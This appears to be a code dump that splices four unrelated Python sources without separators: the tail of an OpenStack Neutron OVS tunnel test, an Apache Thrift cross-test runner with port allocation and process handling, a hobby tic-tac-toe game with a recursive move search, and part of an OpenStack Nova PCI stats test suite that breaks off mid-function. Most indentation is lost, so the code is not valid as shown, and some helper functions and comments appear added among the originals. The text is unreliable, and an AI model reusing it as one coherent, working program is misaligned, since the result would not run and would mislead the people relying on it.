self.mod_agent.OVSNeutronAgent,
'process_network_ports') as process_network_ports,\
mock.patch.object(self.mod_agent.OVSNeutronAgent,
'tunnel_sync'),\
mock.patch.object(time, 'sleep'),\
mock.patch.object(self.mod_agent.OVSNeutronAgent,
'update_stale_ofport_rules') as update_stale:
log_exception.side_effect = Exception(
'Fake exception to get out of the loop')
scan_ports.side_effect = [reply2, reply3]
process_network_ports.side_effect = [
False, Exception('Fake exception to get out of the loop')]
q_agent = self._build_agent()
            # Hack to test the loop: start the method and expect it to raise
            # during the second iteration. If something goes wrong, the
            # assert_has_calls below will catch it.
try:
q_agent.daemon_loop()
except Exception:
pass
# FIXME(salv-orlando): There should not be assertions on log
# messages
log_exception.assert_called_once_with(
"Error while processing VIF ports")
scan_ports.assert_has_calls([
mock.call(set(), set()),
mock.call(set(['tap0']), set())
])
process_network_ports.assert_has_calls([
mock.call({'current': set(['tap0']),
'removed': set([]),
'added': set(['tap2'])}, False),
mock.call({'current': set(['tap2']),
'removed': set(['tap0']),
'added': set([])}, False)
])
self.assertTrue(update_stale.called)
self._verify_mock_calls()
class TunnelTestOFCtl(TunnelTest, ovs_test_base.OVSOFCtlTestBase):
pass
class TunnelTestUseVethInterco(TunnelTest):
USE_VETH_INTERCONNECTION = True
def _define_expected_calls(self, arp_responder=False):
self.mock_int_bridge_cls_expected = [
mock.call(self.INT_BRIDGE),
]
self.mock_phys_bridge_cls_expected = [
mock.call(self.MAP_TUN_BRIDGE),
]
self.mock_tun_bridge_cls_expected = [
mock.call(self.TUN_BRIDGE),
]
self.mock_int_bridge_expected = [
mock.call.create(),
mock.call.set_secure_mode(),
mock.call.setup_controllers(mock.ANY),
mock.call.delete_port('patch-tun'),
mock.call.setup_default_table(),
]
self.mock_map_tun_bridge_expected = [
mock.call.setup_controllers(mock.ANY),
mock.call.setup_default_table(),
mock.call.delete_port('phy-%s' % self.MAP_TUN_BRIDGE),
mock.call.add_port(self.intb),
]
self.mock_int_bridge_expected += [
mock.call.delete_port('int-%s' % self.MAP_TUN_BRIDGE),
mock.call.add_port(self.inta)
]
self.mock_int_bridge_expected += [
mock.call.drop_port(in_port=self.MAP_TUN_INT_OFPORT),
]
self.mock_map_tun_bridge_expected += [
mock.call.drop_port(in_port=self.MAP_TUN_PHY_OFPORT),
]
self.mock_tun_bridge_expected = [
mock.call.reset_bridge(secure_mode=True),
mock.call.setup_controllers(mock.ANY),
mock.call.add_patch_port('patch-int', 'patch-tun'),
]
self.mock_int_bridge_expected += [
mock.call.add_patch_port('patch-tun', 'patch-int')
]
self.mock_int_bridge_expected += [
mock.call.get_vif_ports(),
mock.call.db_list('Port', columns=['name', 'other_config', 'tag'])
]
self.mock_tun_bridge_expected += [
mock.call.delete_flows(),
mock.call.setup_default_table(self.INT_OFPORT, arp_responder),
]
self.device_exists_expected = [
mock.call('int-%s' % self.MAP_TUN_BRIDGE),
]
self.ipdevice_expected = [
mock.call('int-%s' % self.MAP_TUN_BRIDGE),
mock.call().link.delete()
]
self.ipwrapper_expected = [
mock.call(),
mock.call().add_veth('int-%s' % self.MAP_TUN_BRIDGE,
'phy-%s' % self.MAP_TUN_BRIDGE)
]
self.get_bridges_expected = [mock.call(), mock.call()]
self.inta_expected = [mock.call.link.set_up()]
self.intb_expected = [mock.call.link.set_up()]
self.execute_expected = [mock.call(['udevadm', 'settle',
'--timeout=10'])]
class TunnelTestUseVethIntercoOFCtl(TunnelTestUseVethInterco,
ovs_test_base.OVSOFCtlTestBase):
pass
class TunnelTestWithMTU(TunnelTestUseVethInterco):
VETH_MTU = 1500
def _define_expected_calls(self, arp_responder=False):
super(TunnelTestWithMTU, self)._define_expected_calls(arp_responder)
self.inta_expected.append(mock.call.link.set_mtu(self.VETH_MTU))
self.intb_expected.append(mock.call.link.set_mtu(self.VETH_MTU))
class TunnelTestWithMTUOFCtl(TunnelTestWithMTU,
ovs_test_base.OVSOFCtlTestBase):
pass
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import contextlib
import multiprocessing
import multiprocessing.managers
import os
import platform
import random
import signal
import socket
import subprocess
import sys
import threading
import time
from .compat import str_join
from .test import TestEntry, domain_socket_path
from .report import ExecReporter, SummaryReporter
RESULT_TIMEOUT = 128
RESULT_ERROR = 64
class ExecutionContext(object):
def __init__(self, cmd, cwd, env, report):
self._log = multiprocessing.get_logger()
self.report = report
self.cmd = cmd
self.cwd = cwd
self.env = env
self.timer = None
self.expired = False
self.killed = False
def _expire(self):
self._log.info('Timeout')
self.expired = True
self.kill()
def kill(self):
self._log.debug('Killing process : %d' % self.proc.pid)
self.killed = True
if platform.system() != 'Windows':
try:
os.killpg(self.proc.pid, signal.SIGKILL)
except Exception:
self._log.info('Failed to kill process group', exc_info=sys.exc_info())
try:
self.proc.kill()
except Exception:
self._log.info('Failed to kill process', exc_info=sys.exc_info())
def _popen_args(self):
args = {
'cwd': self.cwd,
'env': self.env,
'stdout': self.report.out,
'stderr': subprocess.STDOUT,
}
        # make sure child processes don't remain after killing
if platform.system() == 'Windows':
DETACHED_PROCESS = 0x00000008
args.update(creationflags=DETACHED_PROCESS | subprocess.CREATE_NEW_PROCESS_GROUP)
else:
args.update(preexec_fn=os.setsid)
return args
def start(self, timeout=0):
joined = str_join(' ', self.cmd)
self._log.debug('COMMAND: %s', joined)
self._log.debug('WORKDIR: %s', self.cwd)
self._log.debug('LOGFILE: %s', self.report.logpath)
self.report.begin()
self.proc = subprocess.Popen(self.cmd, **self._popen_args())
if timeout > 0:
self.timer = threading.Timer(timeout, self._expire)
self.timer.start()
return self._scoped()
@contextlib.contextmanager
def _scoped(self):
yield self
self._log.debug('Killing scoped process')
if self.proc.poll() is None:
self.kill()
self.report.killed()
else:
self._log.debug('Process died unexpectedly')
self.report.died()
def wait(self):
self.proc.communicate()
if self.timer:
self.timer.cancel()
self.report.end(self.returncode)
@property
def returncode(self):
return self.proc.returncode if self.proc else None
def exec_context(port, logdir, test, prog):
report = ExecReporter(logdir, test, prog)
prog.build_command(port)
return ExecutionContext(prog.command, prog.workdir, prog.env, report)
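# A minimal, self-contained illustration of the ExecutionContext lifecycle
# (a sketch, not part of the original runner: the fake report object below
# only stubs out the callbacks that ExecReporter normally provides, and the
# 'echo' command assumes a POSIX environment).
def _execution_context_demo():
    class _FakeReport(object):
        out = None          # inherit the parent process' stdout
        logpath = '<none>'

        def begin(self):
            pass

        def end(self, returncode):
            print('exit status: %s' % returncode)

        def killed(self):
            pass

        def died(self):
            pass

    ctx = ExecutionContext(['echo', 'hello'], os.getcwd(), None, _FakeReport())
    with ctx.start(timeout=5):
        ctx.wait()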
# NOTE: the flag is named run_async rather than async because 'async' is a
# reserved word in Python 3.7+.
def run_test(testdir, logdir, test_dict, max_retry, run_async=True):
try:
logger = multiprocessing.get_logger()
max_bind_retry = 3
retry_count = 0
bind_retry_count = 0
test = TestEntry(testdir, **test_dict)
while True:
if stop.is_set():
logger.debug('Skipping because shutting down')
return (retry_count, None)
logger.debug('Start')
with PortAllocator.alloc_port_scoped(ports, test.socket) as port:
logger.debug('Start with port %d' % port)
sv = exec_context(port, logdir, test, test.server)
cl = exec_context(port, logdir, test, test.client)
logger.debug('Starting server')
with sv.start():
if test.delay > 0:
logger.debug('Delaying client for %.2f seconds' % test.delay)
time.sleep(test.delay)
connect_retry_count = 0
max_connect_retry = 10
connect_retry_wait = 0.5
while True:
logger.debug('Starting client')
cl.start(test.timeout)
logger.debug('Waiting client')
cl.wait()
if not cl.report.maybe_false_positive() or connect_retry_count >= max_connect_retry:
if connect_retry_count > 0 and connect_retry_count < max_connect_retry:
                                    logger.warn('[%s]: Connected after %d retries (%.2f sec each)' % (test.server.name, connect_retry_count, connect_retry_wait))
                                # Wait 50 ms to make sure the server does not die right at the end.
time.sleep(0.05)
break
logger.debug('Server may not be ready, waiting %.2f second...' % connect_retry_wait)
time.sleep(connect_retry_wait)
connect_retry_count += 1
if sv.report.maybe_false_positive() and bind_retry_count < max_bind_retry:
logger.warn('[%s]: Detected socket bind failure, retrying...', test.server.name)
bind_retry_count += 1
else:
if cl.expired:
result = RESULT_TIMEOUT
elif not sv.killed and cl.proc.returncode == 0:
# Server should be alive at the end.
result = RESULT_ERROR
else:
result = cl.proc.returncode
if result == 0 or retry_count >= max_retry:
return (retry_count, result)
else:
logger.info('[%s-%s]: test failed, retrying...', test.server.name, test.client.name)
retry_count += 1
except (KeyboardInterrupt, SystemExit):
logger.info('Interrupted execution')
        if not run_async:
raise
stop.set()
return None
except:
        if not run_async:
raise
logger.warn('Error executing [%s]', test.name, exc_info=sys.exc_info())
return (retry_count, RESULT_ERROR)
class PortAllocator(object):
def __init__(self):
self._log = multiprocessing.get_logger()
self._lock = multiprocessing.Lock()
self._ports = set()
self._dom_ports = set()
self._last_alloc = 0
def _get_tcp_port(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
port = sock.getsockname()[1]
self._lock.acquire()
try:
ok = port not in self._ports
if ok:
self._ports.add(port)
self._last_alloc = time.time()
finally:
self._lock.release()
sock.close()
return port if ok else self._get_tcp_port()
def _get_domain_port(self):
        port = random.randint(1024, 65535)
self._lock.acquire()
try:
ok = port not in self._dom_ports
if ok:
self._dom_ports.add(port)
finally:
self._lock.release()
return port if ok else self._get_domain_port()
def alloc_port(self, socket_type):
if socket_type in ('domain', 'abstract'):
return self._get_domain_port()
else:
return self._get_tcp_port()
    # static method for inter-process invocation
@staticmethod
@contextlib.contextmanager
def alloc_port_scoped(allocator, socket_type):
        port = allocator.alloc_port(socket_type)
        try:
            yield port
        finally:
            # make sure the port is returned even if the body raises
            allocator.free_port(socket_type, port)
def free_port(self, socket_type, port):
self._log.debug('free_port')
self._lock.acquire()
try:
if socket_type == 'domain':
self._dom_ports.remove(port)
path = domain_socket_path(port)
if os.path.exists(path):
os.remove(path)
elif socket_type == 'abstract':
self._dom_ports.remove(port)
else:
self._ports.remove(port)
        except (KeyError, OSError):
self._log.info('Error while freeing port', exc_info=sys.exc_info())
finally:
self._lock.release()
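# A small usage sketch for PortAllocator (hypothetical helper, not part of
# the original module): allocate a free TCP port, use it, and let the scoped
# context manager return it to the pool afterwards.
def _port_allocator_demo():
    allocator = PortAllocator()
    with PortAllocator.alloc_port_scoped(allocator, 'tcp') as port:
        # any socket_type other than 'domain'/'abstract' takes the TCP path
        print('allocated TCP port %d' % port)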
class NonAsyncResult(object):
def __init__(self, value):
self._value = value
def get(self, timeout=None):
return self._value
def wait(self, timeout=None):
pass
def ready(self):
return True
def successful(self):
return self._value == 0
class TestDispatcher(object):
def __init__(self, testdir, basedir, logdir_rel, concurrency):
self._log = multiprocessing.get_logger()
self.testdir = testdir
self._report = SummaryReporter(basedir, logdir_rel, concurrency > 1)
self.logdir = self._report.testdir
# seems needed for python 2.x to handle keyboard interrupt
self._stop = multiprocessing.Event()
self._async = concurrency > 1
if not self._async:
self._pool = None
global stop
global ports
stop = self._stop
ports = PortAllocator()
else:
self._m = multiprocessing.managers.BaseManager()
self._m.register('ports', PortAllocator)
self._m.start()
self._pool = multiprocessing.Pool(concurrency, self._pool_init, (self._m.address,))
self._log.debug(
'TestDispatcher started with %d concurrent jobs' % concurrency)
def _pool_init(self, address):
global stop
global m
global ports
stop = self._stop
m = multiprocessing.managers.BaseManager(address)
m.connect()
ports = m.ports()
def _dispatch_sync(self, test, cont, max_retry):
r = run_test(self.testdir, self.logdir, test, max_retry, False)
cont(r)
return NonAsyncResult(r)
def _dispatch_async(self, test, cont, max_retry):
self._log.debug('_dispatch_async')
return self._pool.apply_async(func=run_test, args=(self.testdir, self.logdir, test, max_retry), callback=cont)
def dispatch(self, test, max_retry):
index = self._report.add_test(test)
def cont(result):
if not self._stop.is_set():
retry_count, returncode = result
self._log.debug('freeing port')
self._log.debug('adding result')
self._report.add_result(index, returncode, returncode == RESULT_TIMEOUT, retry_count)
self._log.debug('finish continuation')
fn = self._dispatch_async if self._async else self._dispatch_sync
return fn(test, cont, max_retry)
def wait(self):
if self._async:
self._pool.close()
self._pool.join()
self._m.shutdown()
return self._report.end()
def terminate(self):
self._stop.set()
if self._async:
self._pool.terminate()
self._pool.join()
self._m.shutdown()
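# A rough driver sketch (illustrative only; the real entry point builds the
# test dictionaries from the cross-test configuration, whose schema is not
# shown in this module, and the return value of wait() comes from
# SummaryReporter.end()):
#
#     dispatcher = TestDispatcher('test', os.getcwd(), 'log', concurrency=4)
#     try:
#         for test_dict in test_dicts:          # hypothetical input
#             dispatcher.dispatch(test_dict, max_retry=2)
#         summary = dispatcher.wait()
#     except KeyboardInterrupt:
#         dispatcher.terminate()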
"""
Hard-coded tic-tac-toe.
author: Jyler
date: 2018/01/06
Before starting reinforcement learning, where we can make a program learn
how to play tic-tac-toe itself, let's start by hard-coding the rules.
"""
import random
class tictactoeBoard():
def __init__(self):
self.boardState = {
1:" ",
2:" ",
3:" ",
4:" ",
5:" ",
6:" ",
7:" ",
8:" ",
9:" "
}
self.listX = []
self.listO = []
def getBoard(self):
boardState = self.boardState
print("-----" * 2 + "---") # | x | o | x |
print("| " + boardState[1] + " | " + boardState[2] + " | " + boardState[3] + " |")
print("-----" * 2 + "---")
print("| " + boardState[4] + " | " + boardState[5] + " | " + boardState[6] + " |")
print("-----" * 2 + "---")
print("| " + boardState[7] + " | " + boardState[8] + " | " + boardState[9] + " |")
print("-----" * 2 + "---")
    def updateBoard(self, pos, new_value):
        self.boardState[pos] = new_value
        # Keep track of moves that have been made.
        # (list.append returns None, so never rebind a list to its result.)
        if new_value.lower() == 'x':
            self.listX.append(pos)
        elif new_value.lower() == 'o':
            self.listO.append(pos)
def checkBoard(self):
# Checks if someone has won or if it is a tie
# Check what positions have been played.
listX = self.listX
listO = self.listO
#print(listO,listX)
# check if someone has won
# 1 = 'o', 2 = 'x', False = no one
winBool = self.checkWin(listX, listO)
if winBool == 1:
print("O wins")
return True
elif winBool == 2:
print("X wins")
return True
else:
pass
# check if there is a tie
tieBool = self.checkTie(listX, listO)
if tieBool:
print("Tie.")
return True
else:
return False
def checkWin(self,listX,listO):
winStates = [
{1,2,3},{4,5,6},{7,8,9},{1,4,7},
{2,5,8},{3,6,9},{1,5,9},{3,5,7}
]
for winState in winStates:
#print("X: ",listX, " O: ",listO)
#print("winState: ",winState)
if (winState & set(listX)) == winState:
return 2 # 'x' wins
elif (winState & set(listO)) == winState:
return 1 # 'O' wins
else:
pass
return False
def checkTie(self,listX,listO):
combined = listX + listO
for i in range(1,10):
if i not in combined:
#print("no tie")
return False
else:
pass
#print("tie")
return True
def free(self):
listX = self.listX
listO = self.listO
combined = listX + listO
freeSpaces = [ space for space in range(1,10) if space not in combined ]
return freeSpaces
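# A quick self-check for tictactoeBoard (not part of the original game flow;
# purely illustrative of the updateBoard/checkBoard API).
def _board_demo():
    b = tictactoeBoard()
    for pos in (1, 2, 3):      # 'x' takes the whole top row
        b.updateBoard(pos, 'x')
    b.getBoard()
    assert b.checkBoard()      # prints "X wins" and returns True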
class playgame():
def __init__(self):
# randomize who goes first.
num = random.random()
if num >= 0.5:
human_first = True
print("You go first.")
else:
human_first = False
# User selects what 'piece' they want to use.
        while True:
            player_label = input("Choose x's or o's:\n").lower()
            if player_label in ['x', 'o']:
                break
            else:
                print("Choose a correct label. ['x','o']")
        machine_label = 'o' if player_label == 'x' else 'x'
self.board = tictactoeBoard() # Initialize the board
board = self.board
board.getBoard()
#self.listStates = staticArray()
# Play until someone wins or there is a tie.
self.playGame(board, player_label, machine_label, human_first)
def human(self, board, label):
message = ("Type move position. Free positions are: " +
str(board.free()) + "\n")
player = int(input(message))
freePos = board.free()
while True:
if player in freePos:
break
else:
print("Are you trying to cheat?")
print("I'll let you choose again.")
player = int(input(message))
board.updateBoard(player,label)
board.getBoard()
if board.checkBoard():
return True
else:
pass
def reset(self):
self.winCont = []
self.tieCont = []
def machine(self, board, label):
currentBoard = dict(board.boardState)
#freePos = board.free()
if label == 'x':
currentTurn = 1 # so that the think function can check if a winState is for the machine or not
machine_label = 1 # This should actually be changed s.t., if I wanted, I could play the machine against itself.
elif label == 'o':
currentTurn = 0
machine_label = 0
self.reset()
self.storeBoardState = dict(board.boardState) # This is unnecessary.. I think
self.think(currentBoard, currentTurn, 0, machine_label)
print("MACHINE DECI",self.winCont)
print("TIE: ",self.tieCont)
if len(self.winCont) != 0:
tempMoves = 100
for tup in self.winCont:
#print("tup", tup)
if tup[1] < tempMoves:
tempMoves = tup[1]
chooseMove = tup[0]
else:
pass
elif len(self.tieCont) != 0:
chooseMove = self.tieCont[0][0]
else:
freeS = self.board.free()
lengthFreeS = len(freeS)
idx = random.randint(0,lengthFreeS-1)
chooseMove = freeS[idx]
print("I know you've won.")
#print("DEBUG1", chooseMove, " moves I thought of: ", self.winCont, " tie cont: ",self.tieCont)
board.updateBoard(chooseMove, label)
board.getBoard()
if board.checkBoard():
return True
else:
pass
def playGame(self, board, player_label, machine_label, human_first):
if human_first:
while True:
#
hum_val = self.human(board,player_label)
if hum_val:
break
else:
pass
print("________________")
mach_val = self.machine(board,machine_label)
if mach_val:
break
else:
pass
else:
while True:
#
mach_val = self.machine(board,machine_label)
if mach_val:
break
else:
pass
hum_val = self.human(board,player_label)
if hum_val:
break
else:
pass
def think(self, board, turn, depth, machine_label):
        # turn: 0 = 'o', 1 = 'x'; cycle between turns with (turn + 1) % 2.
        # board: the (hypothetical) board state being explored.
        # Return codes, roughly: 0/1 mark lines of play where the machine
        # eventually/immediately wins, 2/5 mark opponent wins (5 when found
        # at depth 2), 3 is a tie, and 4/6 tell the caller to prune the move
        # that led here.
boardState = dict(board)
freePos = list([ i for i in boardState.keys() if boardState[i] not in ['x','o'] ])
# If first move, choose anywhere.
if len(freePos) == 9:
posTemp = random.randint(1,9)
self.winCont.append((posTemp,2))
return 0
# Cycle which turn the machine is considering.
if turn == 0:
presentTurn = 'o'
elif turn == 1:
presentTurn = 'x'
winState = self.checkWin(boardState) # returns 2 if 'x' wins, 1 if 'o' wins, else False
tieState = self.checkTie(boardState) # return True if tie, else False
        if winState is not False:  # someone has already won on this hypothetical board
if int(not(turn)) != machine_label: # Is it a winState for the opponent?
if depth == 2:
temp1 = 5
else:
temp1 = 2
            elif depth == 1:  # the machine itself wins with this immediate move
                temp1 = 1
else:
temp1 = 0 # WinState
return temp1
elif tieState:
return 3
else:
pass
for pos in range(1,10):
if pos not in freePos:
continue
boardState = dict(board)
boardState[pos] = presentTurn
# recursive step
temp = self.think(boardState, ((turn+1)%2), depth+1, machine_label)
if temp == 0:
if depth == 0:
self.winCont.append((pos,3))
elif temp == 1:
if depth == 0:
self.winCont.append((pos,2))
elif temp == 2:
return 4
elif temp == 3:
if depth == 0:
self.tieCont.append((pos,1))
elif temp == 4:
freePos.remove(pos)
elif temp == 5:
return 6
elif temp == 6:
if depth == 0:
freePos.remove(pos)
else:
pass
return 0
def checkWin(self,boardState):
listX = [ i for i in boardState.keys() if boardState[i] == 'x' ]
listO = [ i for i in boardState.keys() if boardState[i] == 'o' ]
winStates = [
{1,2,3},{4,5,6},{7,8,9},{1,4,7},
{2,5,8},{3,6,9},{1,5,9},{3,5,7}
]
for winState in winStates:
if (winState & set(listX)) == winState:
return 2 # 'x' wins
elif (winState & set(listO)) == winState:
return 1 # 'O' wins
else:
pass
return False
def checkTie(self,boardState):
listX = [ i for i in boardState.keys() if boardState[i] == 'x' ]
listO = [ i for i in boardState.keys() if boardState[i] == 'o' ]
combined = listX + listO
for i in range(1,10):
if i not in combined:
#print("no tie")
return False
else:
pass
#print("tie")
return True
class staticArray():
def __init__(self):
self.reset()
def insert(self, place, data):
if place == 0:
self.loss.append(data)
elif place == 1:
self.win.append(data)
elif place == 2:
self.tie.append(data)
else:
pass
def reset(self):
self.loss = []
self.win = []
self.tie = []
def search(self, place):
lossList = self.loss
winList = self.win
tieList = self.tie
if place == 0:
for i in lossList:
if len(i) == 2:
return i
else:
pass
elif place == 1: # winlist
if len(winList) == 1:
return True
else:
                return False
def length(self, place):
if place == 0:
y = len(self.loss)
elif place == 1:
y = len(self.win)
elif place == 2:
y = len(self.tie)
        else:
            y = 0  # unknown bucket; return 0 rather than raising NameError
return y
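# Entry point (an addition for convenience: the original file defined the
# classes but never instantiated them; playgame() runs one interactive game).
if __name__ == "__main__":
    playgame()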
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import exception
from nova import objects
from nova.pci import stats
from nova.pci import whitelist
from nova import test
from nova.tests.unit.pci import fakes
fake_pci_1 = {
'compute_node_id': 1,
'address': '0000:00:00.1',
'product_id': 'p1',
'vendor_id': 'v1',
'status': 'available',
'extra_k1': 'v1',
'request_id': None,
'numa_node': 0,
}
fake_pci_2 = dict(fake_pci_1, vendor_id='v2',
product_id='p2',
address='0000:00:00.2',
numa_node=1)
fake_pci_3 = dict(fake_pci_1, address='0000:00:00.3')
fake_pci_4 = dict(fake_pci_1, vendor_id='v3',
product_id='p3',
address='0000:00:00.3',
numa_node= None)
pci_requests = [objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v1'}]),
objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v2'}])]
pci_requests_multiple = [objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v1'}]),
objects.InstancePCIRequest(count=3,
spec=[{'vendor_id': 'v2'}])]
class PciDeviceStatsTestCase(test.NoDBTestCase):
def _create_fake_devs(self):
self.fake_dev_1 = objects.PciDevice.create(fake_pci_1)
self.fake_dev_2 = objects.PciDevice.create(fake_pci_2)
self.fake_dev_3 = objects.PciDevice.create(fake_pci_3)
self.fake_dev_4 = objects.PciDevice.create(fake_pci_4)
map(self.pci_stats.add_device,
[self.fake_dev_1, self.fake_dev_2,
self.fake_dev_3, self.fake_dev_4])
def setUp(self):
super(PciDeviceStatsTestCase, self).setUp()
self.pci_stats = stats.PciDeviceStats()
# The following two calls need to be made before adding the devices.
patcher = fakes.fake_pci_whitelist()
self.addCleanup(patcher.stop)
self._create_fake_devs()
def test_add_device(self):
self.assertEqual(len(self.pci_stats.pools), 3)
self.assertEqual(set([d['vendor_id'] for d in self.pci_stats]),
set(['v1', 'v2', 'v3']))
self.assertEqual(set([d['count'] for d in self.pci_stats]),
set([1, 2]))
def test_remove_device(self):
self.pci_stats.remove_device(self.fake_dev_2)
self.assertEqual(len(self.pci_stats.pools), 2)
self.assertEqual(self.pci_stats.pools[0]['count'], 2)
self.assertEqual(self.pci_stats.pools[0]['vendor_id'], 'v1')
def test_remove_device_exception(self):
self.pci_stats.remove_device(self.fake_dev_2)
self.assertRaises(exception.PciDevicePoolEmpty,
self.pci_stats.remove_device,
self.fake_dev_2)
def test_object_create(self):
m = objects.pci_device_pool.from_pci_stats(self.pci_stats.pools)
new_stats = stats.PciDeviceStats(m)
self.assertEqual(len(new_stats.pools), 3)
self.assertEqual(set([d['count'] for d in new_stats]),
set([1, 2]))
self.assertEqual(set([d['vendor_id'] for d in new_stats]),
set(['v1', 'v2', 'v3']))
def test_support_requests(self):
self.assertEqual(self.pci_stats.support_requests(pci_requests),
True)
self.assertEqual(len(self.pci_stats.pools), 3)
self.assertEqual(set([d['count'] for d in self.pci_stats]),
set((1, 2)))
def test_support_requests_failed(self):
self.assertEqual(
self.pci_stats.support_requests(pci_requests_multiple), False)
self.assertEqual(len(self.pci_stats.pools), 3)
self.assertEqual(set([d['count'] for d in self.pci_stats]),
set([1, 2]))
def test_apply_requests(self):
self.pci_stats.apply_requests(pci_requests)
self.assertEqual(len(self.pci_stats.pools), 2)
self.assertEqual(self.pci_stats.pools[0]['vendor_id'], 'v1')
self.assertEqual(self.pci_stats.pools[0]['count'], 1)
def test_apply_requests_failed(self):
self.assertRaises(exception.PciDeviceRequestFailed,
self.pci_stats.apply_requests,
pci_requests_multiple)
def test_consume_requests(self):
devs = self.pci_stats.consume_requests(pci_requests)
self.assertEqual(2, len(devs))
self.assertEqual(set(['v1', 'v2']),
set([dev['vendor_id'] for dev in devs]))
def test_consume_requests_empty(self):
devs = self.pci_stats.consume_requests([])
self.assertEqual(0, len(devs))
def test_consume_requests_failed(self):
self.assertRaises(exception.PciDeviceRequestFailed,
self.pci_stats.consume_requests,
pci_requests_multiple)
def test_support_requests_numa(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0),
objects.NUMACell(id=1, cpuset=set(), memory=0)]
self.assertEqual(True, self.pci_stats.support_requests(
pci_requests, cells))
def test_support_requests_numa_failed(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0)]
self.assertEqual(False, self.pci_stats.support_requests(
pci_requests, cells))
def test_support_requests_no_numa_info(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0)]
pci_request = [objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v3'}])]
self.assertEqual(True, self.pci_stats.support_requests(
pci_request, cells))
def test_consume_requests_numa(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0),
objects.NUMACell(id=1, cpuset=set(), memory=0)]
devs = self.pci_stats.consume_requests(pci_requests, cells)
self.assertEqual(2, len(devs))
self.assertEqual(set(['v1', 'v2']),
set([dev['vendor_id'] for dev in devs]))
def test_consume_requests_numa_failed(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0)]
self.assertRaises(exception.PciDeviceRequestFailed,
self.pci_stats.consume_requests,
pci_requests, cells)
def test_consume_requests_no_numa_info(self):
cells = [objects.NUMACell(id=0, cpuset=set(), memory=0)]
pci_request = [objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': 'v3'}])]
devs = self.pci_stats.consume_requests(pci_request, cells)
self.assertEqual(1, len(devs))
self.assertEqual(set(['v3']),
set([dev['vendor_id'] for dev in devs]))
@mock.patch.object(whitelist, 'get_pci_devices_filter')
class PciDeviceStatsWithTagsTestCase(test.NoDBTestCase):
def setUp(self):
super(PciDeviceStatsWithTagsTestCase, self).setUp()
self.pci_stats = stats.PciDeviceStats()
self._create_whitelist()
def _create_whitelist(self):
white_list = ['{"vendor_id":"1137","product_id":"0071",'
'"address":"*:0a:00.*","physical_network":"physnet1"}',
'{"vendor_id":"1137","product_id":"0072"}']
self.pci_wlist = whitelist.PciHostDevicesWhiteList(white_list)
def _create_pci_devices(self):
self.pci_tagged_devices = []
for dev in range(4):
pci_dev = {'compute_node_id': 1,
'address': '0000:0a:00.%d' % dev,
'vendor_id': '1137',
'product_id': '0071',
'status': 'available',
'request_id': None,
'numa_node': 0}
self.pci_tagged_devices.append(objects.PciDevice.create(pci_dev))
self.pci_untagged_devices = []
for dev in range(3):
pci_dev = {'compute_node_id': 1,
'address': '0000:0b:00.%d' % dev,
'vendor_id': '1137',
'product_id': '0072',
'status': 'available',
'request_id': None,
'numa_node': 0}
self.pci_untagged_devices.append(objects.PciDevice.create(pci_dev))
map(self.pci_stats.add_device, self.pci_tagged_devices)
map(self.pci_stats.add_device, self.pci_untagged_devices)
def _assertPoolContent(self, pool, vendor_id, product_id, count, **tags):
self.assertEqual(vendor_id, pool['vendor_id'])
self.assertEqual(product_id, pool['product_id'])
self.assertEqual(count, pool['count'])
if tags:
for k, v in tags.iteritems():
self.assertEqual(v, pool[k])
def _assertPools(self):
# Pools are ordered based on the number of keys. 'product_id',
# 'vendor_id' are always part of the keys. When tags are present,
# they are also part of the keys. In this test class, we have
# two pools with the second one having the tag 'physical_network'
# and the value 'physnet1'
self.assertEqual(2, len(self.pci_stats.pools))
self._assertPoolContent(self.pci_stats.pools[0], '1137', '0072',
len(self.pci_untagged_devices))
self.assertEqual(self.pci_untagged_devices,
self.pci_stats.pools[0]['devices'])
self._assertPoolContent(self.pci_stats.pools[1], '1137', '0071',
len(self.pci_tagged_devices),
physical_network='physnet1')
self.assertEqual(self.pci_tagged_devices,
self.pci_stats.pools[1]['devices'])
def test_add_devices(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
self._assertPools()
    def test_consume_requests(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
pci_requests = [objects.InstancePCIRequest(count=1,
spec=[{'physical_network': 'physnet1'}]),
objects.InstancePCIRequest(count=1,
spec=[{'vendor_id': '1137',
'product_id': '0072'}])]
devs = self.pci_stats.consume_requests(pci_requests)
self.assertEqual(2, len(devs))
self.assertEqual(set(['0071', '0072']),
set([dev['product_id'] for dev in devs]))
self._assertPoolContent(self.pci_stats.pools[0], '1137', '0072', 2)
self._assertPoolContent(self.pci_stats.pools[1], '1137', '0071', 3,
physical_network='physnet1')
def test_add_device_no_devspec(self, mock_get_dev_filter):
mock_get_dev_filter.return_value = self.pci_wlist
self._create_pci_devices()
pci_dev = {'compute_node_id': 1,
'address': '0000:0c:00.1',
'vendor_id': '2345',
'product_id': '0172',
'status': 'available',
'request_id': None}
pci_dev_obj = objects.PciDevice.create(pci_dev)
